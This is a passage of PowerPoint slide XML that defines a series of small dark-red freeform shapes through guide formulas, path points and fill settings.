                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 63"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 63 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="63">
                  <a:moveTo>
                    <a:pt x="34" y="35"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="35"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="200000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10562" name="Freeform 611"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3352"/>
              <a:ext cx="17" cy="44"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 17 w 17"/>
                <a:gd name="T1" fmla="*/ 16 h 44"/>
                <a:gd name="T2" fmla="*/ 17 w 17"/>
                <a:gd name="T3" fmla="*/ 44 h 44"/>
                <a:gd name="T4" fmla="*/ 0 w 17"/>
                <a:gd name="T5" fmla="*/ 24 h 44"/>
                <a:gd name="T6" fmla="*/ 0 w 17"/>
                <a:gd name="T7" fmla="*/ 0 h 44"/>
                <a:gd name="T8" fmla="*/ 17 w 17"/>
                <a:gd name="T9" fmla="*/ 16 h 44"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 17"/>
                <a:gd name="T16" fmla="*/ 0 h 44"/>
                <a:gd name="T17" fmla="*/ 17 w 17"/>
                <a:gd name="T18" fmla="*/ 44 h 44"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="17" h="44">
                  <a:moveTo>
                    <a:pt x="17" y="16"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="16"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10563" name="Freeform 612"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3383"/>
              <a:ext cx="29" cy="55"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 29 w 29"/>
                <a:gd name="T1" fmla="*/ 30 h 55"/>
                <a:gd name="T2" fmla="*/ 29 w 29"/>
                <a:gd name="T3" fmla="*/ 55 h 55"/>
                <a:gd name="T4" fmla="*/ 0 w 29"/>
                <a:gd name="T5" fmla="*/ 27 h 55"/>
                <a:gd name="T6" fmla="*/ 0 w 29"/>
                <a:gd name="T7" fmla="*/ 0 h 55"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 30 h 55"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 29"/>
                <a:gd name="T16" fmla="*/ 0 h 55"/>
                <a:gd name="T17" fmla="*/ 29 w 29"/>
                <a:gd name="T18" fmla="*/ 55 h 55"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="29" h="55">
                  <a:moveTo>
                    <a:pt x="29" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="30"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10564" name="Freeform 613"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2676" y="3486"/>
              <a:ext cx="39" cy="71"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 39 w 39"/>
                <a:gd name="T1" fmla="*/ 43 h 71"/>
                <a:gd name="T2" fmla="*/ 39 w 39"/>
                <a:gd name="T3" fmla="*/ 71 h 71"/>
                <a:gd name="T4" fmla="*/ 0 w 39"/>
                <a:gd name="T5" fmla="*/ 30 h 71"/>
                <a:gd name="T6" fmla="*/ 0 w 39"/>
                <a:gd name="T7" fmla="*/ 0 h 71"/>
                <a:gd name="T8" fmla="*/ 39 w 39"/>
                <a:gd name="T9" fmla="*/ 43 h 71"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 39"/>
                <a:gd name="T16" fmla="*/ 0 h 71"/>
                <a:gd name="T17" fmla="*/ 39 w 39"/>
                <a:gd name="T18" fmla="*/ 71 h 71"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="39" h="71">
                  <a:moveTo>
                    <a:pt x="39" y="43"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="39" y="71"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39" y="43"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10565" name="Freeform 614"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2642" y="3451"/>
              <a:ext cx="32" cy="64"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 32"/>
                <a:gd name="T1" fmla="*/ 34 h 64"/>
                <a:gd name="T2" fmla="*/ 32 w 32"/>
                <a:gd name="T3" fmla="*/ 64 h 64"/>
                <a:gd name="T4" fmla="*/ 0 w 32"/>
                <a:gd name="T5" fmla="*/ 29 h 64"/>
                <a:gd name="T6" fmla="*/ 0 w 32"/>
                <a:gd name="T7" fmla="*/ 0 h 64"/>
                <a:gd name="T8" fmla="*/ 32 w 32"/>
                <a:gd name="T9" fmla="*/ 34 h 64"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 32"/>
                <a:gd name="T16" fmla="*/ 0 h 64"/>
                <a:gd name="T17" fmla="*/ 32 w 32"/>
                <a:gd name="T18" fmla="*/ 64 h 64"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="32" h="64">
                  <a:moveTo>
                    <a:pt x="32" y="34"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="34"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10566" name="Freeform 615"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2606" y="3415"/>
              <a:ext cx="34" cy="62"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 34 h 62"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 62 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 26 h 62"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 62"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 34 h 62"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 62"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 62 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="62">
                  <a:moveTo>
                    <a:pt x="34" y="34"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="34"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10567" name="Freeform 616"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="2999"/>
              <a:ext cx="30" cy="44"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 30"/>
                <a:gd name="T1" fmla="*/ 17 h 44"/>
                <a:gd name="T2" fmla="*/ 30 w 30"/>
                <a:gd name="T3" fmla="*/ 44 h 44"/>
                <a:gd name="T4" fmla="*/ 0 w 30"/>
                <a:gd name="T5" fmla="*/ 27 h 44"/>
                <a:gd name="T6" fmla="*/ 0 w 30"/>
                <a:gd name="T7" fmla="*/ 0 h 44"/>
                <a:gd name="T8" fmla="*/ 30 w 30"/>
                <a:gd name="T9" fmla="*/ 17 h 44"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 30"/>
                <a:gd name="T16" fmla="*/ 0 h 44"/>
                <a:gd name="T17" fmla="*/ 30 w 30"/>
                <a:gd name="T18" fmla="*/ 44 h 44"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="30" h="44">
                  <a:moveTo>
                    <a:pt x="30" y="17"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="30" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="17"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10568" name="Freeform 617"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2643" y="3037"/>
              <a:ext cx="33" cy="50"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 33 w 33"/>
                <a:gd name="T1" fmla="*/ 19 h 50"/>
                <a:gd name="T2" fmla="*/ 33 w 33"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 33"/>
                <a:gd name="T5" fmla="*/ 30 h 50"/>
                <a:gd name="T6" fmla="*/ 0 w 33"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 33 w 33"/>
                <a:gd name="T9" fmla="*/ 19 h 50"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 33"/>
                <a:gd name="T16" fmla="*/ 0 h 50"/>
                <a:gd name="T17" fmla="*/ 33 w 33"/>
                <a:gd name="T18" fmla="*/ 50 h 50"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="33" h="50">
                  <a:moveTo>
                    <a:pt x="33" y="19"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="33" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="19"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10569" name="Freeform 618"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2607" y="3016"/>
              <a:ext cx="34" cy="49"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 21 h 49"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 49 h 49"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 28 h 49"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 49"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 21 h 49"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 49"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 49 h 49"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="49">
                  <a:moveTo>
                    <a:pt x="34" y="21"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="21"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10570" name="Freeform 619"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3062"/>
              <a:ext cx="30" cy="48"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 30"/>
                <a:gd name="T1" fmla="*/ 21 h 48"/>
                <a:gd name="T2" fmla="*/ 30 w 30"/>
                <a:gd name="T3" fmla="*/ 48 h 48"/>
                <a:gd name="T4" fmla="*/ 0 w 30"/>
                <a:gd name="T5" fmla="*/ 27 h 48"/>
                <a:gd name="T6" fmla="*/ 0 w 30"/>
                <a:gd name="T7" fmla="*/ 0 h 48"/>
                <a:gd name="T8" fmla="*/ 30 w 30"/>
                <a:gd name="T9" fmla="*/ 21 h 48"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 30"/>
                <a:gd name="T16" fmla="*/ 0 h 48"/>
                <a:gd name="T17" fmla="*/ 30 w 30"/>
                <a:gd name="T18" fmla="*/ 48 h 48"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="30" h="48">
                  <a:moveTo>
                    <a:pt x="30" y="21"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="30" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="21"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10571" name="Freeform 620"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2677" y="3130"/>
              <a:ext cx="39" cy="56"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 39 w 39"/>
                <a:gd name="T1" fmla="*/ 25 h 56"/>
                <a:gd name="T2" fmla="*/ 39 w 39"/>
                <a:gd name="T3" fmla="*/ 56 h 56"/>
                <a:gd name="T4" fmla="*/ 0 w 39"/>
                <a:gd name="T5" fmla="*/ 30 h 56"/>
                <a:gd name="T6" fmla="*/ 0 w 39"/>
                <a:gd name="T7" fmla="*/ 0 h 56"/>
                <a:gd name="T8" fmla="*/ 39 w 39"/>
                <a:gd name="T9" fmla="*/ 25 h 56"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
